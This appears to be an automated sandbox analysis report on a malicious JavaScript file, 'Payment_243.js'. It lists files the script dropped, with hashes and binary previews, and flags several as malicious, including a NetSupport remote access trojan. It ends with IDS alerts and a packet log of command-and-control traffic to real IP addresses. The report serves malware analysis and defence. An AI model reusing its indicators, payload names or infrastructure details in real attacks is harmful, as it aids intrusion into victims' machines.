                                                                                    SHA-512:276DF846F72F2B410852F0709F3EFFD853C3B012E94A6A3DFFB364F9597D4CCFE453B6533CE7A67C9DCE5B829C0F96E9838A267269687213D996B60591C586F0
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Corporation" Comments="MF tracing profile" Company="Microsoft Corporation" Copyright="Microsoft Corporation" Tag="MFTrace">.. <Profiles>.. <EventCollector Id="EventCollector_Camera_MF_Trace" Name="MFTrace Event Collector">.. <BufferSize Value="1024" />.. <Buffers Value="3" PercentageOfTotalMemory="true" MaximumBufferSpace="192" />.. </EventCollector>.. <EventProvider Id="AuthUX_1" Name="3ec987dd-90e6-5877-ccb7-f27cdf6a976b" />.. <EventProvider Id="AuthUX_2" Name="41ad72c3-469e-5fcf-cacf-e3d278856c08" />.. <EventProvider Id="AuthUX_3" Name="4f7c073a-65bf-5045-7651-cc53bb272db5" />.. <EventProvider Id="AuthUX_4" Name="a6c5c84d-c025-5997-0d82-e608d1abbbee" />.. <EventProvider Id="AuthUX_5" Name="c0ac3923-5cb1-5e37-ef8f-ce84d60f1c74" />.. <EventProvider Id="AuthUX_6" Name="df350158-0f8f-555d-7e4f-f1151ed14299" />.. <EventProvider Id="Aut
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):291
                                                                                    Entropy (8bit):4.678249360262278
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:jN+SboYZlqqRQJOBF1Fi9MO8jCaMbNW7KuW/4kutLwyAGI/V6s:jN+oo6lqqRNhFi9MO6EW7XFVLqGO6s
                                                                                    MD5:708428751D01199ED5F53E0FB2AD4BF0
                                                                                    SHA1:93F563A090F7EE511D8774C8AF4F8FF46F0D66E6
                                                                                    SHA-256:579032CB7B7BEA083E077BA85CB62DC231BA672F93CE1B55A379968FB3C2CEE9
                                                                                    SHA-512:4A75EEAA2A973D7F726DD10E7769A22E9FDD084D9EC8A1CBA742FBB66F0A6A6343421C9FDF58C61B91920D2F3DCC99C705A2844D33B53F8FCF3D38A909B5A00B
                                                                                    Malicious:false
                                                                                    Preview:// Dictionary of default apps to install into new profiles. They will be.// dynamically downloaded and installed from CWS on profile creation..{. // Drive extension. "ghbmnnjooekpmoecnnnilnnbdlolhkhi" : {. "external_update_url": "https://clients2.google.com/service/update2/crx". }.}..
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):46460
                                                                                    Entropy (8bit):7.996244892825645
                                                                                    Encrypted:true
                                                                                    SSDEEP:768:8fAM/r+Jh0uwbtWlaaN6+H+aL6FsMSWGuPOLGIankYdaEqT4pKAdzSag3ZQr7WqM:8DrKh3wblLlJVzGykYdaC1WYWqGh
                                                                                    MD5:D224C335C82ACAA733441CE43E59C881
                                                                                    SHA1:FFC9502870FFBC116A44AE491306B7F6903D25B8
                                                                                    SHA-256:F3E8FF2CA65192446A62D85B75C8C75C105CFBB7B17A8FA67F9A0C6E87EF3EC0
                                                                                    SHA-512:D57A7902B2003B751796F2CFA1BFE4AD90A393BB1F68CE354B6D24B749937469AA8FBEE77838FC6BFFD83DC13D799C8C078783FFE236A1558B8900F71AFFAFE5
                                                                                    Malicious:false
                                                                                    Preview:TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......a*si........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....|..t......&8u....xL.Y$.)..Z4At...W.*.....Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6.....i..AS....-.V.7{.O..C..... ...?V$..NP........'..v){.pk....TV.UQ?'.a.h...eZYy....F...q/O.\....
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):125324
                                                                                    Entropy (8bit):7.998476693287313
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:M+uqGKz72juA1+hbRI2QG6Btjjo6fiZZ86cNdbt:M+uqdvZndRIZPE6scN
                                                                                    MD5:74C052D8AF6C37EBA1FBF76663A8522E
                                                                                    SHA1:9315AE6AEB3E913F053D53A1F7EA1A29692E90E7
                                                                                    SHA-256:5110690167DBB46389FF5792EB2672ED41EA5983382207D1E365C4634E620B7E
                                                                                    SHA-512:A8ACA06CAF290F879E8DAA672A681D53F191E8F03C90BAFB49856616248205B33A8C466DC25D81FE215F0D66E42F2D7221075250B3BE6C4299491CCAFDE08220
                                                                                    Malicious:false
                                                                                    Preview:TDF$PrL....pb ...8'[.tt).$b..G...k.X1...}(.50.........qZ!G.A..?..=.ZN..>.).....:........*.O..!%.pw....y).UK......v.}v.K...)q..z?.G(..`..<....jy...Ojz?y......!&....j.bO.!../..7...2P...GQ......}!.>..b".\i...g...U.S..g.,..tW.........m.,9..8.S.+.....F)..b7.P..+..1..M.d-.v.u.W^./...Vb.2.E.......8kn..sK.SL.S..lPA4..Z.K3....{.7y..U.F.L[...V2t.q.U...n...C..Pn..H..bb..<.........f.^.K/d.\........o.hw....l..In[Oa....H.<..nW..+H... ..x.%y..|..^.?....\.G.X.......q....:.D.EE..Z.x....3..K...)......0.....(...{.W.;bw.Xtj...u.m...No.t...g.Q...V)..O..{po.@9.....e...i.p.}sN.J...(.j_V...f.EF..Sj.^....q.....W..7...^.I...%..R&..8K..^N..;.b.`X....N/S....z....e..K.ORI.gc......*;.n.q9.}^.........zL.T0.....-.H...I..Pv.349k.q.$.U.u.6w..m..ar.CX.....:$V;^..............OO...F..........%cxnbqE'\...+.."...u..`...`n....z..Hw.W$.$.......i........X..1D.M.....%..g....V7J..'.b.+)?...e...-... ...;.....%....;....3s.p...L..|/*.a.................F@.2nl.K.o-7.0,.h.k...
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):21184
                                                                                    Entropy (8bit):6.98505637818331
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                    MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                    SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                    SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                    SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1794
                                                                                    Entropy (8bit):3.5509498109363986
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                                    MD5:3F78A0569C858AD26452633157103095
                                                                                    SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                                    SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                                    SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                                    Malicious:false
                                                                                    Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):773968
                                                                                    Entropy (8bit):6.901559811406837
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:Windows setup INFormation
                                                                                    Category:dropped
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):4.93007757242403
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                    Malicious:false
                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):46
                                                                                    Entropy (8bit):4.532048032699691
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                    MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                    SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                    SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                    SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                    Malicious:false
                                                                                    Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33144
                                                                                    Entropy (8bit):6.7376663312239256
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                    MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                    SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                    SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                    SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\pcicapi.dll, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 16%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):63864
                                                                                    Entropy (8bit):6.446503462786185
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                    MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                    SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                    SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                    SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):265816
                                                                                    Entropy (8bit):6.521007214956242
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:MW218gr7s2yIHB0pTPdTX9zUbEbStE97zjAs1RtTcJTfIv0se7POWu/HgsGU1VTl:MWSfr7sXSmPDbKPJ6/AsNk+1x
                                                                                    MD5:49C51ACE274D7DB13CAA533880869A4A
                                                                                    SHA1:B539ED2F1A15E2D4E5C933611D736E0C317B8313
                                                                                    SHA-256:1D6407D7C7FFD2642EA7F97C86100514E8E44F58FF522475CB42BCC43A1B172B
                                                                                    SHA-512:13440009E2F63078DCE466BF2FE54C60FEB6CEDEED6E9E6FC592189C50B0780543C936786B7051311089F39E9E3CCB67F705C54781C4CAE6D3A8007998BEFBF6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@~..!..!..!...p...!...p..!...p..+!..M...!..M...!..!...!..M...!..s..!..s..!..s..!..s..!..Rich.!..................PE..L...{..T...........!.........N.......k.......................................0..............................................4...x.......................X......../..................................Ha..@...............l............................text............................... ..`.rdata..v...........................@..@.data....B......."..................@....rsrc...............................@..@.reloc.../.......0..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):880216
                                                                                    Entropy (8bit):5.239371133407635
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:vTAPYZEyRr+NDnaLyx2lz8MSjtX08pYRc29qcQmsGahsQZsbRN9S:YYF+Eyx2lzujtEIYRc1cQmsGa7ON9S
                                                                                    MD5:642DC7E57F0C962B9DB4C8FB346BC5A7
                                                                                    SHA1:ACEE24383B846F7D12521228D69135E5704546F6
                                                                                    SHA-256:63B4B5DB4A96A8ABEC82B64034F482B433CD4168C960307AC5CC66D2FBF67EDE
                                                                                    SHA-512:FB163A0CE4E3AD0B0A337F5617A7BF59070DF05CC433B6463384E8687AF3EDC197E447609A0D86FE25BA3EE2717FD470F2620A8FC3A2998A7C3B3A40530D0BAE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A....u...u...u..C$G.3u..C$y.Iu..C$x..u...V..u...S..u...u..ju...H..u...'}.&u...'D..u...'C..u...'F..u..Rich.u..........................PE..L...s..T...........!.........R..............0......................................:W....@.........................`...........d....P..p............R..X....`...D......................................@............0..T............................text...}........................... ..`.rdata.......0......."..............@..@.data...|<..........................@..._RDATA.......@......................@..@.rsrc...p....P......................@..@.reloc...D...`...F..................@..B........................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):2845498
                                                                                    Entropy (8bit):7.997717653428638
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
                                                                                    MD5:4C1AFE882E6D7C945A8397DCB02A2478
                                                                                    SHA1:85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
                                                                                    SHA-256:67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
                                                                                    SHA-512:A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
                                                                                    Malicious:false
                                                                                    Preview:PK........Dw*Z................install/PK.........P)Z..Q~....|.......install/5B8FEB2AF817493Es.....TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......a*si........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....|..t......&8u....xL.Y$.)..Z4At...W.*.....Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6
                                                                                    File type:ASCII text
                                                                                    Entropy (8bit):5.508101926235647
                                                                                    TrID:
                                                                                      File name:Payment_243.js
                                                                                      File size:5'736'023 bytes
                                                                                      MD5:19cef6a2f4055703922f3e8fd2c92fb9
                                                                                      SHA1:e6ccef88b3cbba0424a39edab01697716fd8d813
                                                                                      SHA256:d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
                                                                                      SHA512:0976d92c923aa47d9667c8881f32217fa78ca8b60ed7963adf332ce3874699abc69d86610a25d51f228e6fd801e9358bc22ec1e06dfb2fa32b9efaa153c53b54
                                                                                      SSDEEP:49152:v7DIzjCxbxqHlpM1MNN0D6hO22DzhYzYBmv9+8pJm3hp/KP1G6C+3qUxc8g7cEXQ:C
                                                                                      TLSH:70465A0DAEF70091A923313C8FAF680AB674801B1509DD147D9DA3945FA953867FEFE8
                                                                                      File Content Preview:./*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you u
                                                                                      Icon Hash:68d69b8bb6aa9a86
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-14T16:21:07.992710+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.2249166185.157.213.71443TCP
                                                                                      2025-01-14T16:21:08.602563+01001810004Joe Security ANOMALY Microsoft Office HTTP activity1192.168.2.224916545.155.249.21580TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 14, 2025 16:21:07.992710114 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:07.997627020 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:07.998229027 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.003062010 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.007947922 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602437019 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602452993 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602464914 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602525949 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602538109 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602562904 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.602562904 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.602574110 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602585077 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602591038 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.602596045 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602629900 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.602629900 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.602715015 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602725029 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.602756977 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.607434988 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.607470036 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.607481956 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.607501984 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.607505083 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.607505083 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.607515097 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.607531071 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.607664108 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.607871056 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.607939005 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689152002 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689177990 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689214945 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689244032 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689244032 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689268112 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689280987 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689308882 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689312935 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689476013 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689749956 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689812899 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689820051 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689821959 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689861059 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689861059 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.689943075 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.689954996 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690133095 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.690133095 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.690687895 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690720081 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690753937 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.690753937 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.690875053 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690886021 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690896988 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690907955 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.690916061 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.690956116 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.690956116 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.691536903 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.691606045 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.691618919 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.691625118 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.691656113 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.691656113 CET4916580192.168.2.2245.155.249.215
                                                                                      Jan 14, 2025 16:21:08.691679001 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.691921949 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.691932917 CET804916545.155.249.215192.168.2.22
                                                                                      Jan 14, 2025 16:21:08.691943884 CET4916580192.168.2.2245.155.249.215
